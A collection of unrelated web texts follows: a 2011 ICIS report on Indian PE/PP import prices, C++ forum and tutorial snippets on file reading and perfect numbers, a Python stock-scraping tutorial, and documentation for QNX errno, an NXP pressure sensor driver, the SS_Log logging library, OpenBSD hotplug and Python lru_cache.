19 December 2011 04:44 [Source: ICIS news] By Ong Sheau Ling

SINGAPORE - In the week ended 16 December, average low density polyethylene (LDPE) film spot prices were assessed at $1,380/tonne (€1,063/tonne) CFR (cost and freight) Mumbai, down $5/tonne from the previous week, while linear low density polyethylene (LLDPE) was at $1,250/tonne CFR Mumbai, down $25/tonne, according to ICIS. High-density polyethylene (HDPE) film average prices were at $1,315/tonne, down by $5/tonne from the previous week, while polypropylene (PP) raffia average spot prices were assessed at $1,340/tonne CFR Mumbai, $25/tonne lower week on week, ICIS data showed.

A much weaker Indian rupee against the US dollar translates into much higher prices for polymer imports compared with domestic material, market players said. The rupee fell to a record low of Rs54.30 to the US dollar on 15 December, representing a decline of more than 18% from the highs hit in July, on concerns about the country's slowing economic growth, according to Reuters.

"We do not [know] what we will be paying when the cargo arrives, given the volatile [rupee] currency," a Mumbai-based trader said. To reduce his foreign exchange risk, the trader said he prefers to keep imports low and concentrate more on trading domestic goods.

The sharp depreciation of the rupee has also prompted Indian banks to raise the limits for opening letters of credit (LCs) to Rs54.00/kg from Rs46.00/kg. Indian players said this meant a 20% cost increase for buyers opening LCs for imports.

"The Indian government is trying its best to control the flow of the rupee, so as to bring a stop to its depreciation," an Indian PE and PP producer said.

"Our customers who are dependent on imports are helpless now. They do not want to risk paying more when the cargo arrives at their factories," another Mumbai-based trader said.

But within the domestic market, demand is not robust, Indian players said.

"Next quarter's performance is an extension of this [December]. The market will still be slow and, based on the demand situation, PE and PP prices will fall," a third Mumbai-based trader said.

On 16 December, offers for PE and PP imports were largely lower compared with the previous week. Thai low density PE (LDPE) film was offered at $1,360/tonne CFR (cost and freight) Mumbai for January shipments. Iranian HDPE film materials were offered at $1,300/tonne CFR Mumbai for December/January shipments, while Middle East PP raffia products were offered at $1,320-1,360/tonne CFR Mumbai, they said.

($1 = Rs52.75)
http://www.icis.com/Articles/2011/12/19/9517105/india-pe-pp-import-prices-to-fall-weak-rupee-deters-buyers.html
How do i get one line of a text file and turn it into a string? Using fstream.h. IE. Get line 2 and make it char line2[100];

Heh; something i actually know:

#include <iostream.h>
#include <fstream.h>

char line[100];

int main()
{
    ifstream input("whatever.txt");
    input >> line;
    cout << line;
    input.close();
    return 0;
}

hehehe

where/can you specify what line you want?

Last edited by Okiesmokie; 03-01-2002 at 08:11 PM.

Ok, using fstream.h I would just loop through all the lines you don't want and then grab the one you want, like this:

Code:
#include <fstream.h>
#include <iostream.h>

#define LINE_NUMBER 2

int main()
{
    ifstream i;        // Main file object.
    char buff[100];    // Input buffer.

    i.open("whatever.txt");    // Open file.

    // Read lines until we reach the right one.
    for(int count = 0; count < LINE_NUMBER; count++)
    {
        i.getline(buff, 100);  // Get line.
    }

    cout << "Line " << LINE_NUMBER << " in the file was the data: " << buff << endl; // Tell user results.

    i.close();                 // Close file.
    return 0;                  // Done.
}

Hope that helps ^_^

Tazar
https://cboard.cprogramming.com/cplusplus-programming/12130-getting-one-line-text-file.html
Get It Done in 5 Seconds!

Are you bored of doing the same stuff again and again? Feeling like your life is just doing the same thing over and over? Here is the thing: today I am going to introduce a tool to automate your BORING stuff, Python. Python is perhaps the easiest language to learn. With your acquired Python skill, you will be able not only to increase your productivity, but also to focus on work which you are more interested in. Let's get started!

I will use an example, paper trading in the Singapore stock market, as an illustration of how automation can be done. Paper trading allows you to practice investing or trading with virtual money before you really put real money in. This is a good way to start, as it proves whether your strategy works.

This is the agenda which I will be sharing:

Part 1 — Input the stock code and amount which you want to trade in a text file.
Part 2 — How to do web scraping on your own, the full journey.
Part 3 — Clean and tabulate data.
Part 4 — Output the result into a csv or excel file.

Follow the whole journey and you will notice how simple it is to automate your boring stuff and to update your prices IN 5 seconds.

Part 1 — Input the stock code and amount which you want to trade in a text file.

Launch a new text file and enter the stock code and the price at which you will buy the particular stock, separated by a comma, as shown.

Part 2 — How to do web scraping on your own, the full journey

This is a snapshot of the SGX website. I am going to illustrate how to scrape all the trading information contained in this table. Open Google Chrome, right click on the website and you will be able to see the below snapshot. Click on the Inspect button, then click on the Network tab (top right corner of the below snapshot, as highlighted in the purple bracket).
Next, click on the row highlighted in the purple box and then choose Preview, as shown in the highlighted green box; both are shown in Snapshot 4 below. You can see from the Preview that all the data is contained in JSON format. Next, click on the purple box (Headers) in Snapshot 5. What I am doing now is inspecting what elements I should put in to scrape data from this page. From Snapshot 5 above, you will be able to see the Request URL, which is the url you need to put in the request part later. Due to URL encoding, "%2c" in the Request URL decodes to ",". If you are interested in encoding, view this link for more information. Now let's prepare the required information for you to send a proper request to the server.

Part 1 Request Url

After changing all the "%2c" to ",", the request url will turn out to be this link below.

Part 2 Headers

A request header is a component of a network packet sent by a browser or client to the server to request a specific page or data on the Web server. Referring to the purple box in Snapshot 6, this is the header part which you should put in when you are scraping the website.

{"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Origin": "", "Referer": ""}

Now let's put everything together, as shown in the gist below.

import requests

HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
           "Origin": "",
           "Referer": ""}

# Start downloading stocks info from sgx
# (the request URL itself was lost from the original post; request_url
# stands for the decoded URL prepared above)
req = requests.get(request_url, headers=HEADERS)

Part 3 — Clean Data

By now you will have the response in JSON format. We will use the Python pandas library to clean the data. First, load in the stock codes which you filled in earlier and clean them.
import json
import pandas as pd

with open('selected.txt') as f:
    selected_sc = f.readlines()
selected_sc = [x.replace('\n', '') for x in selected_sc]
portfolio = {x.split(',')[0]: float(x.split(',')[1]) for x in selected_sc}

Then, load the scraped data into a JSON object and change it to a pandas object.

data = json.loads(req.text)['data']
df = pd.DataFrame(data['prices'])

Next, rename the columns to be easier to understand.

df = df.rename(
    columns={'b': 'Bid', 'lt': 'Last', 'bv': 'Bid_Volume', 'c': 'Change',
             'sv': 'Ask_volume', 'h': 'High', 'l': 'Low', 'o': 'open',
             'p': 'Change_percent', 's': 'Ask', 'vl': 'Volume',
             'nc': 'Stock_code'})

Finally, filter for the stock codes which you want to invest or trade in, and then calculate the price difference.

df = df[df['Stock_code'].isin(portfolio.keys())][['Stock_code', 'Last']]
df['bought_price'] = df['Stock_code'].map(portfolio)
# Percentage change relative to the bought price
df['percentage_changes'] = (df['Last'] - df['bought_price']) / df['bought_price'] * 100
df['percentage_changes'] = df['percentage_changes'].apply(
    lambda x: '{0:.2f}%'.format(x))

Part 4 — Output the result in a csv or excel file.

Save the data to a csv file and 🎉WE ARE OFFICIALLY DONE! 🎉

df.to_csv('result.csv', index=False)

Below is a snapshot of the csv file:

Final Thought

I am currently working as a Data Scientist, and what I can tell you is that crawling is still very important. Thank you for reading this post. Feel free to leave comments below on topics which you may be interested to know about. I will be publishing more posts in the future about my experiences and projects.

About Author: Low. Source: towardsdatascience
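To try the cleaning pipeline above without hitting the SGX server, here is a sketch that runs the same rename/filter/compute steps on a synthetic payload shaped like the JSON described in Part 2. The tickers and prices are made up, and the percentage change divides by the bought price, which I believe is the intent of the original column name.

```python
import pandas as pd

# Synthetic stand-in for json.loads(req.text)['data'] -- values are made up
data = {"prices": [
    {"nc": "D05", "lt": 33.0, "b": 32.9, "s": 33.1},
    {"nc": "O39", "lt": 12.0, "b": 11.9, "s": 12.1},
]}

# Same shape as the portfolio parsed from selected.txt
portfolio = {"D05": 30.0}

# Rename the terse column codes, keep only the stocks we hold,
# and compute the percentage change against the bought price.
df = pd.DataFrame(data["prices"]).rename(
    columns={"nc": "Stock_code", "lt": "Last", "b": "Bid", "s": "Ask"})
df = df[df["Stock_code"].isin(portfolio)][["Stock_code", "Last"]]
df["bought_price"] = df["Stock_code"].map(portfolio)
df["percentage_changes"] = (df["Last"] - df["bought_price"]) / df["bought_price"] * 100

print(df)
```

Running this prints one row for D05 with a percentage change of 10.00, since (33.0 - 30.0) / 30.0 * 100 = 10.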
https://learningactors.com/get-rid-of-boring-stuff-using-python/
errno: values of the global errno variable

#include <errno.h>

The errno variable is set to certain error values by many functions whenever an error has occurred. In QNX, many library functions make use of calls such as Send(), Sendfd() or qnx_vc_attach(). In order to avoid repetition in the description of possible errno values for each library function, the following table summarizes the errno values that may occur when the above functions are called. The following errors may be returned when the filesystem detects a serious problem, or when a device or driver failure occurs.

errno may be implemented as a macro, but it can always be examined or set as if it were a simple integer variable. Values for errno are defined in the file <errno.h>, and include at least the following values:

/*
 * The following program makes an illegal call
 * to the write() function, then prints the
 * value held in 'errno'.
 */
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>

int main( void )
{
    int errvalue;

    errno = 0;
    write( -1, "hello, world\n", strlen( "hello, world\n" ) );
    errvalue = errno;
    printf( "The error generated was %d\n", errvalue );
    return( errvalue );
}

Classification: POSIX 1003.1
http://users.pja.edu.pl/~jms/qnx/help/watcom/clibref/qnx/errno.html
Introduction to Perfect Number C++

Perfect numbers in C++ are those numbers whose value is equal to the sum of their divisors (excluding the number itself). Divisors are the denominators which divide a numerator completely without leaving any remainder. Perfect numbers have unique characteristics which make them special: they are complete and absolute in nature. However, they are a very rare phenomenon, and so far mathematicians have discovered only 51 perfect numbers in the range from one up to the maximum limit one can imagine and a supercomputer can process.

Logic Behind Perfect Number

There are no traces in history of who discovered or invented perfect numbers. It is believed that the Egyptians had some interest in perfect numbers, but it was the Greeks who did a lot of research on them, and people like Pythagoras, O'Connor and Robertson took an extensive interest in perfect numbers. There is a belief that there is an associated perfect number for every Mersenne prime, and Mersenne also discovered the formula. The formula is:

N = 2^(P-1) × (2^P - 1)

Where,
- P is a prime number and (2^P - 1) is a Mersenne prime.
- For the prime number 2, the perfect number is 6 and the Mersenne prime is 3; for the next prime number 3, the perfect number is 28 and the Mersenne prime is 7, and so on.

Significance of Perfect Number

Though there are several theories floating around on the importance of perfect numbers and their link with prime numbers, the importance of perfect numbers and their usage is still unclear. Some of the hard facts on perfect numbers are:

- Treated as superior to other numbers.
- Easy to understand, but with no visible use.
- Not capable of solving any mathematical problems.
- Not a great tool for providing solutions in other fields like business, economics and science.

Knowledge and background of perfect numbers helps mathematicians improve their data analysis skills and build AI models for various scenarios.

How to Check Perfect Number in C++?
Program steps to find out if a given number is a perfect number or otherwise:

- Accept the number that has to be validated as a perfect number.
- Divide the number by 1 and check whether the division leaves any remainder.
- Since the remainder is zero, the divisor 1 is a perfect divisor; accumulate it in a counter.
- Divide the number by 2, check the remainder, and if the remainder is zero, accumulate the divisor in the counter.
- Repeat the step above up to one number before the accepted number.
- Compare the accepted number with the accumulated counter.
- If the values are the same, then the accepted number is a perfect number; otherwise, it is not.

Program steps to choose perfect numbers from a given range of numbers:

- Accept the first number and last number of the range.
- Start with the first number. Check whether it is a perfect number using the steps in the paragraph above. If it is a perfect number, display it.
- Repeat the step above for the next number in the range.
- Continue until the last number in the range.

Examples of Perfect Number C++

Given below are the examples of Perfect Number C++:

Example #1

Find out if a given number is a perfect number or otherwise.

Code:

#include <iostream>
using namespace std;

int main()  // Main program starts here
{
    int gno = 6;    // The number to be checked
    int m = 0;      // Initialize variables
    int total = 0;

    // Display the header
    cout << "Check whether this number " << gno << " is Perfect or not " << ":\n";

    for(m = 1; m < gno; m = m + 1)  // For loop start
    {
        if(gno % m == 0)            // Check remainder == 0
            total = total + m;      // If so, accumulate
    }

    // Compare the number and the accumulated value
    if(total == gno)
        cout << "\n" << "YES... The given number is a perfect Number...";
    if(total != gno)
        cout << "\n" << "Sorry it is not a perfect no.... Try some other";
}

Output:

For the given number 6, the result is:

For the given number 27, the result is:

Change in the code: int gno = 27; // The number to be checked

For the given number 469, the result is:

Change in the code: int gno = 469; // The number to be checked

For the given number 496, the result is:

Change in the code: int gno = 496; // The number to be checked

Example #2

Identify perfect numbers in a given range of numbers.

Code:

#include <iostream>
using namespace std;

int main()  // Program starts here
{
    int first = 1;      // First in the range
    int last = 10000;   // Last in the range
    int pcount = 0;
    int count = 0;      // Initializing all the variables
    int totcount = 0;
    int j = 0;
    int m = 0;
    int total = 0;
    int pfound = 0;

    // Header printing
    cout << "Perfect nos in the Range-" << first << " and " << last << ":\n";
    cout << "\n";

    for(j = first; j <= last; j = j + 1)    // Outer FOR loop
    {
        for(m = 1; m < j; m = m + 1)        // For a given number - inner FOR loop
        {
            if(j % m == 0)                  // Check remainder
                total = total + m;          // Accumulate
        }                                   // Inner loop ends
        if(total == j)                      // Check
        {
            pfound = 1;                     // Yes, perfect number found
            pcount = pcount + 1;
            // Display the number
            cout << "perfect number: " << pcount << " " << j << "\n";
        }
        total = 0;
        count = count + 1;
        if(count > 999)
        {
            totcount = totcount + count;
            // Display status for every 1000 nos
            cout << "processed " << totcount << " Numbers" << "\n";
            count = 0;
        }
    }                                       // Outer loop ends
    // Display if no perfect number was found
    if(pfound == 0)
        cout << "There is no perfect number in the given range";
}

Output:

The result for a range of numbers (1 to 10000):

Conclusion

Even though perfect numbers have not found any applications in the real world, the fundamentals and concepts help mathematicians build data models around complex real-life issues and derive insights from the data.

Recommended Articles

This is a guide to Perfect Number C++. Here we discuss the introduction, logic, significance, how to check perfect numbers in C++, and examples.
You may also have a look at the following articles to learn more –
https://www.educba.com/perfect-number-c-plus-plus/
MPL3115A2 Module

This module contains the driver for the NXP MPL3115A2 pressure, altitude and temperature sensor. The MPL3115A2 is capable of direct I2C communication; the pressure and temperature data are fed into a high-resolution ADC to provide fully compensated and digitized outputs for pressure in Pascals and temperature in °C. The compensated pressure output can then be converted to altitude in meters (using the formula stated in Section 8.1.3 "Pressure/Altitude" of the datasheet, or by putting the sensor in altimeter operating mode).

- class MPL3115A2(i2cdrv, addr=0x60, clk=400000)

Creates an instance of a new MPL3115A2.

Example:

from nxp.mpl3115a2 import mpl3115a2
...
mpl = mpl3115a2.MPL3115A2(I2C0)
mpl.start()
mpl.init()
alt = mpl.get_alt()
pres = mpl.get_pres()

get_alt()

Calculates, from the measured pressure, the current altitude as a value in meters.

Returns the altitude.

get_pres()

Retrieves the current pressure data from the sensor as a calibrated value in Pa.

Returns the pressure.
https://docs.zerynth.com/latest/official/lib.nxp.mpl3115a2/docs/official_lib.nxp.mpl3115a2_mpl3115a2.html
The Complete class documentation can be found at.

Often times we want to create a log of what steps a program takes during run-time. Maybe our program works fine on all of our computers in house, but it is crashing at a customer's site. Or maybe we are developing on WinNT but are testing on Win98, without a development environment on the Win98 machine. Since we can't debug in these cases, it would be nice to have a log of all the steps a program took before it crashed. This set of projects performs program logging and offers numerous features.

This is version 3 of the code. Version 3 has undergone a major re-write, and many of the functions that were once part of the SS_Log class have now been deprecated. All deprecated functions are still supported, so your older code should still work with this version, but for those who've used this code in the past, please make yourself familiar with the new calls.

In the first version of this code, if writing to a file, we would write and flush each message immediately when the message was logged. This caused a good bit of slowdown. The reason for the immediate flush was that, if your program crashed, you'd be guaranteed to have all messages that were logged before the crash. The new design still guarantees that all messages will be logged, but we won't force the overhead of flushing to file every time. Instead, all messages get sent to a server in a separate process that is launched and terminated on the fly, and the server will flush the contents out when it gets the chance. I want to thank Graven for this suggestion. That and the "dynamically filter after the fact" suggestion are the basis of the new design, and they were his ideas. Several other people made suggestions too, and I appreciate all of them. I implemented many of them, and those that I did not, I will definitely keep on the list for the future.

Integration into your project is easy.
The following steps are necessary: That should about do it. The SS_Log code will handle the rest. If you downloaded the sources rather than the binaries, compile the projects in the following order:

#include "SS_Log.h"

int main()
{
    Log("Hello World!");
}

... and as long as you've not forgotten to #define _SS_LOG_ACTIVE in your precompiler, this code will produce a log with the filename, line number, date/time, default filter, message ID, and your message text.

Before reading this whole article (as it is quite long), you might want to just look at the sample program (SS_Log_Test.cpp) that is included in the sources. There are extensive comments, and it might take less time to pick up the gist of things there. That project will not show everything available to you, but it should get you started. At some point you should read the article if you want to learn the full functionality of SS_Log.

The global log is a single instance of the SS_Log class that is available to all files that include SS_Log.h. You can begin using the global log immediately just by including that file, using the following macros:

1. INT Log(TCHAR* pMsg, ...);
2. INT Log(DWORD dwFilter, TCHAR* pMsg, ...);
3. INT LogID(UINT nResourceID, ...);
4. INT LogID(DWORD dwFilter, UINT nResourceID, ...);

The simplest form (the first macro above) takes an sprintf-style format string and a variable number of parameters that will be formatted into the final message. You can access configuration options for the global log with the following macros (we will discuss each in turn):

5. DWORD LogSetFlags(DWORD dwFlags);
6. DWORD LogGetFlags();
7. DWORD LogRemoveFlags(DWORD dwFlags);
8. DWORD LogAddFlags(DWORD dwFlags);
9. INT LogSetDestinationName(LPCTSTR szName);
10. INT LogEraseLog();
11. INT LogLimitOutputSize(DWORD dwSizeLimit);
12. INT LogGetLastError();
13. INT LogSetRegistryKey(LPCTSTR szRegKey);
14. VOID LogUseServer(BOOL bUseServer);
15. BOOL LogSucceeded();
16. VOID LogInstanceHandle(HANDLE hInstance);
17. VOID LogEnterFunction(LPCTSTR szFunctionName);

The first configuration function we need to talk about is LogUseServer(). By default, the SS_Log class will launch a separate process, the SS_Log_Server application (which must be in the %SYSTEMROOT% directory), to capture all messages. There is one main reason for using a separate process: speed. If we logged everything straight to a file (as the first version of SS_Log did), we would need to flush each and every message to disk immediately after it was logged to ensure that, in the event of a program crash, we didn't drop any messages. Flushing every message is VERY inefficient, though, and can easily cause performance problems.

The SS_Log_Server will be launched on demand and will prepare a named pipe to receive all messages. It will then flush these messages out when it gets a chance, never hindering your application, which has long since moved on to other things. During testing, I logged over 100,000 messages in under 10 seconds (AMD 1700+) using the server, and only 1,000 in more than 10 seconds without the server. The server will even terminate itself when the instance of the SS_Log class that started it is destructed. If for some reason you still don't want to use the server, the SS_Log class still supports flushing every message straight out to a file. Call LogUseServer(FALSE) to use this behavior.

Macros 5-8 above allow the user to specify the default flags that will be sent with every message (unless overridden in the message). All flags are grouped into 3 categories:

Level/User flags: LOGTYPE_CRITICAL, LOGTYPE_WARNING, LOGTYPE_NORMAL, LOGTYPE_TRACE, LOGTYPE_TRACE_FAIL, LOGTYPE_INOUT
Debug/Release flags: LOGTYPE_DEBUG, LOGTYPE_RELEASE
Destination flags: LOGTYPE_LOGTOWINDOW, LOGTYPE_LOGTOFILE, LOGTYPE_LOGTOEVENTLOG

Call the LogAddFlags(...) and LogRemoveFlags(...) functions to add or remove any combination of flags using the bitwise OR operator ("|").
These two functions work just as expected, in that the flags you pass in will be added to or removed from the default list.

Use LogSetFlags(...) to overwrite flags in the same group as those flags that you are passing in. This functionality may be a little different than expected. For example, if you were to call LogSetFlags(LOGTYPE_CRITICAL | LOGTYPE_LOGTOEVENTLOG), any currently set flags in the Level/User group would be overwritten by the LOGTYPE_CRITICAL flag, and any current ones in the destinations group would be replaced with LOGTYPE_LOGTOEVENTLOG. You can also ask which flags are currently set as the defaults by calling LogGetFlags(...).

There are no restrictions on the combination of flags that can be set. Any number of flags from any group can be set at any time (e.g. while it might not make much sense to set both the critical and warning flags, both can be set at the same time; on the other hand, it may well make sense to set multiple destinations, such as to file and to window). All messages will be sent with the flags that are currently set, but you can override the current flags on a per-message basis with macros #2 and #4 described above. When overriding the current flags, only those in the group passed in will be overridden (just as when calling the LogSetFlags(...) function).

Currently there are three destinations available, though you can make your own (derive a class from the SSLogDestination class). Messages are "dispatched" to each destination for which one of the destination flags is set (see the destination flags listed above).

With the LOGTYPE_LOGTOFILE flag set, all messages will be sent to the filename specified in the LogSetDestinationName(...) function. The file will be placed in the local directory of the calling application unless you specify otherwise in the destination name.
The LOGTYPE_LOGTOEVENTLOG flag will send all messages to the NT event log. Note that Win9x can be configured to send these messages to a file (see the MSDN ReportEvent() and RegisterEventSource() functions for details).

The LOGTYPE_LOGTOWINDOW flag is more unique. The "window" (which we will call the "viewer") is actually an MFC single document application that is part of SS_Log_Server.exe. All messages will be sent to the server, and the server will display this single document window, placing the messages in a list view. More details on the viewer below.

Call LogGetLastError() to get one of the SS_Log defined errors, found here. Use LogSucceeded() to get a BOOL value stating whether or not the last call was a success.

The LogEraseLog() macro will cause the viewer and file destinations to erase their logs. The NT event log is unaffected by this call.

The LogLimitOutputSize() macro currently only affects the file destination. Pass in the number of kilobytes that you do not want your log file to exceed. The file destination will monitor the file size, and when a message would cause it to exceed this size, the file will be trimmed in half, throwing away the oldest 50% of the messages and making room for new ones.

The LogSetRegistryKey() macro controls where in the registry SS_Log will keep its settings. This allows you to use SS_Log in multiple projects and not have them bump heads. Note that currently you only get to specify a portion of the key. If you pass in "MyCompany\MyApp" as your registry key, SS_Log will store its settings in HKEY_LOCAL_MACHINE\Software\MyCompany\MyApp\SS_Log.

The LogInstanceHandle() macro will give the SS_Log class your application's instance handle, which is necessary when using the LogID(...) macros. If you don't set the instance handle first, calls to LogID(...) will fail.
The LogEnterFunction() macro actually logs two messages. Call this function when entering a function and pass in the function's name. An "Entering MyFunction" message will be created when this line of code is run, AND an "Exiting MyFunction" message will be sent when the function exits.

You can compile out all logging to the global log by simply not #defining _SS_LOG_ACTIVE. This will also compile out all logging for local logs ONLY IF you compile the SS_Log.cpp and SS_Log_Defines.cpp files with your project rather than linking to the SS_Log.lib and SS_LogD.lib files.

Regardless of whether or not you #define _SS_LOG_ACTIVE, you can still eliminate ALL logging by setting the "LoggingDisabled" value in the registry to 1 (or anything other than 0). Each instance of SS_Log will read this value in during construction and obey its value. The registry will be re-read when the user specifies a different registry key in a call to the SetRegistryKey function described above. Currently I have not provided a way to programmatically set this value. You must set this value in the registry manually (i.e. open regedit).

Up to now, everything you've learned has been centered around the global log. This log is simply a globally available instance of the SS_Log class that was created for you when your application fired up. You are not limited to using this log, however. You can create as many "local logs" as you need. This will help you keep different information separate (such as logging to separate logs per thread, per module, or however you'd like to organize it). To create your own instance of the SS_Log class and log two messages to it, use the following code:

SS_Log myLog("MyServerName");
Log(&myLog, "This is my value: %d.", nMyValue);
LogID(&myLog, nResourceID);

The first time you log a message, your instance will launch a new server (even if one has already been launched from the global log).
All messages from this instance will be sent to that server. The server will close itself once this instance of SS_Log is destructed. You can access all the configuration functions just like in the global log, except that you don't use the macros:

18. DWORD myLog.SetFlags(DWORD dwFlags);
19. DWORD myLog.GetFlags();
20. DWORD myLog.RemoveFlags(DWORD dwFlags);
21. DWORD myLog.AddFlags(DWORD dwFlags);
22. INT myLog.SetDestinationName(LPCTSTR szName);
23. INT myLog.EraseLog();
24. INT myLog.LimitOutputSize(DWORD dwSizeLimit);
25. INT myLog.GetLastError();
26. INT myLog.SetRegistryKey(LPCTSTR szRegKey);
27. VOID myLog.UseServer(BOOL bUseServer);
28. BOOL myLog.Succeeded();
29. VOID myLog.InstanceHandle(HANDLE hInstance);
30. VOID LocalLogEnterFunction(SS_Log* pLog, LPCTSTR szFunctionName);

A couple of things to note: the viewer (or "window") and the server are both one app (SS_Log_Server.exe). As described earlier, the SS_Log class will start an instance of the server when needed and terminate that server when it is done. What wasn't mentioned is that if you had the LOGTYPE_LOGTOWINDOW flag set on any of the messages that were sent to the server, and if the filter in the registry is allowing LOGTYPE_LOGTOWINDOW messages to be processed, that instance of SS_Log_Server will remain open and display its window even after the SS_Log that started it is destructed. This is so you can view the messages that were logged to the window.

You can also start SS_Log_Server.exe yourself and open saved logs for sorting/filtering/printing/jumping to code (the print output is weak at best... if anyone wants to have a go at improving it, I'll integrate your code). Files that have been written out with the file destination (the LOGTYPE_LOGTOFILE flag) and files that were saved by the viewer itself can both be opened.

You can filter messages in two ways. The first is by filtering out messages as they come into the server.
When using this method of filtering, the messages are simply thrown away, leaving no way to retrieve them in the future (hence the "destructive" term). You can turn these filters on and off by clicking on "Edit->Filter Incoming Server Messages (destructive)" in the server window (options that are grayed out are not supported in this filter mode). A dialog will pop up with checkboxes for each flag type (including user-defined flag types, discussed in the Creating Your Own Filters section). For a message to arrive at its destination(s), at least 1 flag IN EACH GROUP must be set and the corresponding filter must be turned on. You can also turn the filters on and off directly in the registry. They will be located where you specified with a call to the SetRegistryKey(...) function. If you never call that function, the SS_Log class defaults to behaving as if you had called it and passed in "SS_Log" (see SetRegistryKey(...)). Note that because these filters are maintained in the registry, they will remain active across separate "runs" of your program. Rather than doing destructive filtering, you can leave all the Incoming Server Messages filters on and then do dynamic filtering in the viewer after your app has terminated. Click on "Edit->Filter Listview (non-destructive)" to see your options. In addition to turning the flag type filters on and off, you can filter by message text, filename, and message ID. You can also specify whether all flags or only 1 flag must be set for the message to appear in the view. Note that because these filters are maintained in the registry, they will remain active across separate "runs" of your program. This can be confusing if, for example, you forget that you left a message text filter on and none of your new messages seem to be showing up. Just turn off the filter and they will re-appear.
Also note that when saving, ALL messages in the server will be saved to file, even if they are filtered out of the view by the view filters. Printing, however, prints only what is currently in the view, properly obeying the view filters. Probably the neatest feature of the viewer is its ability to make Visual Studio jump to a file and line number. Just double-click on a logged message and Visual Studio will open that file and move to the line that produced the log (if there is not an instance of Visual Studio running, one will be launched). Note that the first time you do that, the viewer will need to install the SS_Log_AddIn.dll as a plug-in to VC++. Make sure you have that file in your %SYSTEMROOT% folder, and that there are no instances of VC++ running during the install. It is very easy to expand the flags with the SS_Log class. The steps to do so are as follows:

1. Add your new flag to the typedef enum SS_LogFilterType{...}, e.g. LOGTYPE_XYZ = (1<<9).
2. Add the new flag to the users group, e.g. #define LOGTYPEGROUP_USERS ( LOGTYPE_ADD_YOUR_TYPE_HERE | LOGTYPE_XYZ ).
3. Add an entry for the new flag to the SSLogFilter g_Filters[] array.

That's all! Once you run your app for the first time (so the new registry entry can be written to the registry), the new filter will appear in the viewer's filter menus, and everything should work as expected. Note that all user flags are part of the levels/user group of flags (creating a destination flag is an exception, but requires much more effort). You can create your own log destination by deriving a class from the SSLogDestination class. There are several overrides that you can implement to receive notification of messages and configuration options sent from an SS_Log instance.
These overrides include:

// required overrides
virtual BOOL OnWriteMessage      (LOGMESSAGE* pMsg) = 0;

// optional overrides
virtual BOOL OnSetDestinationName(LOGMESSAGE* pMsg);
virtual BOOL OnEraseLog          (LOGMESSAGE* pMsg);
virtual BOOL OnLimitOutputSize   (LOGMESSAGE* pMsg);
virtual BOOL OnSetRegistryKey    (LOGMESSAGE* pMsg);
virtual BOOL OnShutDownServer    ();
virtual BOOL OnBeginUpdate       ();
virtual BOOL OnFinishUpdate      ();
virtual BOOL WillProcessMessage  (LOGMESSAGE* pMsg);

The LOGMESSAGE class contains all the information sent with the message from the SS_Log class. It can be found in the stdafx.h file in the SS_Log_Server project, and has the following accessor methods:

// Get
INT     MessageID    ();
INT     ProcessingID ();
DWORD   Flags        ();
LPSTR   Message      ();
LPSTR   DateTime     ();
LPSTR   Filename     ();
INT     LineNumber   ();
MSGTYPE MessageType  ();

// Set
VOID MessageID    (INT nID);
VOID ProcessingID (INT nID);
VOID Flags        (DWORD nFlags);
VOID Message      (LPSTR szMsg);
VOID DateTime     (LPSTR szDT);
VOID Filename     (LPSTR szFile);
VOID LineNumber   (INT nLine);
VOID MessageType  (MSGTYPE nType);

The message dispatching routine in the server (see the SSLogOutput.cpp file) will check every 5 seconds to see whether or not the server has received new messages for dispatch. If there are new messages, each destination will get an OnBeginUpdate notification. Then, for each new message, the server will call each destination's WillProcessMessage function to determine whether or not we will be logging the message. This function should return TRUE or FALSE after checking the flags for the message passed in and comparing them against the currently set filters. Note that the default implementation of WillProcessMessage will handle most destinations' needs. If WillProcessMessage returns TRUE, the OnWriteMessage function will be called for that message. Your class MUST override this function and do with the message as you will at that point.
Once all new messages have been dispatched, the OnFinishUpdate function will be called as a notification that all messages are processed. If the server has received a shutdown request from the SS_Log class, and if no other instances of the SS_Log class are still bound to the server, then your derived class will receive the OnShutDownServer message in case you need to do some cleanup. All other override functions contain configuration data. You can retrieve the configuration data from the LOGMESSAGE's Message() function (passed into the function as the only parameter). The info will be returned in ANSI text format. Note that even though the OnEraseLog function has a LOGMESSAGE parameter, no information is currently stored in it. Of course, you will need to add a flag to the SS_Log_Defines.h file as described in the Creating Your Own Filters section. Note however, that you should associate the flag with the Destinations group rather than with the Users group. You will also need to create a new instance of your destination type during start up of the server. This can be done in the SSLogOutput::CreateDestination function in the SSLogOutput.cpp file. Please feel free to ask questions, offer comments/suggestions, etc. I'm glad to listen and help. This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
hotplug — devices hot plugging

pseudo-device hotplug 1

#include <sys/types.h>
#include <sys/device.h>
#include <sys/hotplug.h>

The hotplug pseudo-device passes device attachment and detachment events to userland. When a device attaches or detaches, the corresponding event is queued. The events can then be obtained from the queue through the read(2) call on the /dev/hotplug device file. Once an event has been read, it is deleted from the queue. The event queue has a limited size, and if it is full, all new events will be dropped. Each event is described with the following structure declared in the <sys/hotplug.h> header file:

struct hotplug_event {
        int he_type;                    /* event type */
        enum devclass he_devclass;      /* device class */
        char he_devname[16];            /* device name */
};

The he_type field is either HOTPLUG_DEVAT for device attachment or HOTPLUG_DEVDT for detachment. The he_devclass field describes the device class. All device classes can be found in the <sys/device.h> header file:

enum devclass {
        DV_DULL,        /* generic, no special info */
        DV_CPU,         /* CPU (carries resource utilization) */
        DV_DISK,        /* disk drive (label, etc) */
        DV_IFNET,       /* network interface */
        DV_TAPE,        /* tape device */
        DV_TTY          /* serial line interface */
};

Only one structure can be read per call. If there are no events in the queue, the read(2) call will block until an event appears. The hotplug device first appeared in OpenBSD 3.6. The hotplug driver was written by Alexander Yurchenko <grange@openbsd.org>.
There is often a trade-off when it comes to efficiency of CPU vs memory usage. In this post, I will show how the lru_cache decorator can cache results of a function call for quicker future lookup.

from functools import lru_cache

@lru_cache(maxsize=2**7)
def fib(n):
    if n == 1:
        return 0
    if n == 2:
        return 1
    return fib(n - 1) + fib(n - 2)

